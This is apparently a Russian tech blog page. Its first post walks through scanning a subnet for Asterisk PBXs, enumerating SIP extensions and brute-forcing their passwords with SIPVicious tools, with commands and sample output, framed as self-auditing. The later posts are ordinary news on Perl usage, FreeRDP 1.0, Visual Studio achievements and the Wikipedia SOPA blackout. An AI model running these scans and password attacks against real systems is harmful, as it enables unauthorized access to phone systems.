Безопастность Asterisk

Не буду рассказывать, как вы должны защищаться от хацкеров, просто посмотрим как можно проверить свой asterisk на дыры.


Итак есть чудный набор скриптов для этих экспериментов. Называется SIPVicious.


Для того чтобы найти уязвимые акки используются утилиты из пакета SIPVicious: каждая из них работает в консоли и может запускать как под виндой, так и линухом.

Для этого сначала просканируем заданную подсеть (скажем, это будет 192.168.1.1/24), чтобы найти BPX:

./svmap 192.168.1.1/24
| SIP Device | User Agent |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |

Таким образом, мы нашли нашу АТС-ку. Далее необходимо провести ее анализ и отыскать extention’s:

./svwar.py 192.168.1.103
| Extension | Authentication |
------------------------------
| 123 | reqauth |
| 100 | reqauth |
| 101 | noauth |

И хотя результат для нас вряд ли можно назвать неожиданным, мы видим, что номер 101 не требует авторизации. А для 100 и 123 требуется ввести пароль.

Попробуем подобрать его для 100, используя подбор по числовым значениям (а они используются более чем часто):

./svcrack.py 192.168.1.103 -u 100 | Extension | Password | ------------------------ | 100 | 100 |

Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя словарик:

 ./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt
| Extension | Password |
------------------------
| 123 | secret |

Пассы найдены: осталось подставить найденные логин-пароль в свой SIP клиент и проверить их в действии. Конечно, вероятность успешного брутфорса на отдельно взятый аккаунт невелика. Но среди сотен extentionов всегда найдется хотя бы один со слабым паролем. Более того, подход “обнаружить bpx, найти extention, подобрать пароль” является одной из самых простых на VoIP.
Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях. Всем удачной защиты)

FUCK SOPA!

Perl теперь используется менее чем на 1% веб-серверов

По данным последнего исследования, представленного компанией W3Techs, использование Perl на веб-серверах упало ниже отметки одного процента. Когда-то самый популярный скриптовый язык занимает всего лишь пятое место по популярности, с долей в 0,997%.
Места распределились следующим образом:

• PHP - 77.3%
• ASP.NET - 21.7%
• Java - 4.0%
• ColdFusion - 1.2%
• Perl - 1.0%
• Ruby - 0.6%
• Python - 0.3%

Подробнее про ситуация с Perl на сайте W3Techs.com

Вышел релиз FreeRDP-1.0.0

16 января анонсирован выпуск новой версии клиента RDP для *nix. Проект был форкнут с rdesktop. Авторы поставили перед собой цель реализовать все возможности предоставляемые RDP протоколом версии 7.1.
При этом путь был сложным: - заявка поданная на Google Summer of Code 2011 была отклонена. Но это не остановило, и найдя другого спонсора проект продолжил развитие.

Новые возможности:

• RemoteFX - Функция RemoteFX, которая появилась в Windows 7 SP1, позволяет практически полностью стереть для пользователя различия между работой в классической настольной клиентской операционной системе и виртуальной машине. После настройки RemoteFX , пользователи в своих терминальных сессиях с виртуальными машинами смогут видеть полнофункциональные графические эффекты рабочего стола виртуальной машины, в том числе в терминальной сессии будет работать DirectX.
• RemoteApp - это программы, удаленный доступ к которым можно получить через службы терминалов и которые работают так, как будто они запущены на локальном компьютере пользователя.
• Multimedia Redirection - используется для передачи и синхронизации аудио и видео данных из сервера терминалов в клиентский терминал. Клиент может воспроизводить аудио и видео. Поддерживается кодирование с помощью ffmpeg.
• Network Level Authentication (NLA) - Поддерживается версия NTLMv2
• Certificate validation - Осуществляется проверка полученного сертификата (например как в ssh)
• Осуществлен переход на новую систему сборки с помощью cmake
• Добавлены официальные иконки и логотип
• Полностью переработана архитектура приложения - выделены отдельные библиотеки и клиенты к ним
• Разработаны 3 клиента:
  • client/X11 (xfreerdp) - официальный, поддерживает RemoteApp, требуется X11
  • client/DirectFB (dfreerdp) - используется библиотека DirectFB
  • client/Windows (wfreerdp) - для работы в Win32
• Для передачи различных данных или устройств с клиента на сервер и обратно используются различные виртуальные каналы:
  • cliprdr - Перенаправление буфера обмена (Clipboard Redirection)
  • drdynvc - Динамический виртуальный канал (Dynamic Virtual Channels)
    • audin - Перенаправление аудио ввода (Audio Input Redirection)
      • поддерживается библиотека алса (alsa support)
      • поддерживается библиотека пульсаудио (pulse support)
  • tsmf - Мультимедиа редирект (Multimedia Redirection)
    • поддерживается библиотека алса (alsa support)
    • поддерживается библиотека пульсаудио (pulse support)
    • поддерживается ffmpeg библиотека (ffmpeg support)
  • rdpdr - Редирект устройств (Device Redirection)
    • disk - Редирект дисков (Disk Redirection)
    • parallel - Редирект параллельных портов (Parallel Port Redirection)
    • serial - Редирект последовательных портов (Serial Port Redirection)
    • printer - Редирект принтеров (Printer Redirection) поддерживается CUPS
    • smartcard - Редирект смарт карточек (Smartcard Redirection)
  • rdpsnd - Редирект аудио (Sound Redirection)
    • поддерживается алса библиотека (alsa support)
    • поддерживается пульсаудио библиотека (pulse support)
  Скачать

Новый набор видео о хромбуках

Ачивки уже и в Visual Studio

Обнаружена новая тенденция — добавлять ачивки во все что имеет расширение exe. Совсем недавно они появились в Firefox, а теперь с помощью плагина Visual Studio Achievements Beta доступны и в Visual Studio. 32 ачивки разбиты на 6 категорий и самых бородатых программистов будут вешать на доску почета. Let the programming begin!
Попадаются забавные. За программирование вечером в пятницу или субботу дают ачивку Lonely. Если код компилируется больше 10 минут — Time for an Upgrade.

Черная Википедия

То, чего многие боялись.
В знак протеста против анти-пиратского законопроекта SOPA (Stop Online Piracy Act) конгресса США, в котором, кроме вопроса борьбы с нелегальным контентом, предусматривается всеобщее ограничение свободы слова и доступа в Интернете, англоязычная Википедия на сутки 18 января решила закрыться. При переходе на любую статью мы видим черный экран.
Таким образом создатели Википедии пугают всех, предостерегая, к чему может привести жесткий государственный контроль бесплатного содержимого, созданного пользователями. И просят рассказать всем об этом.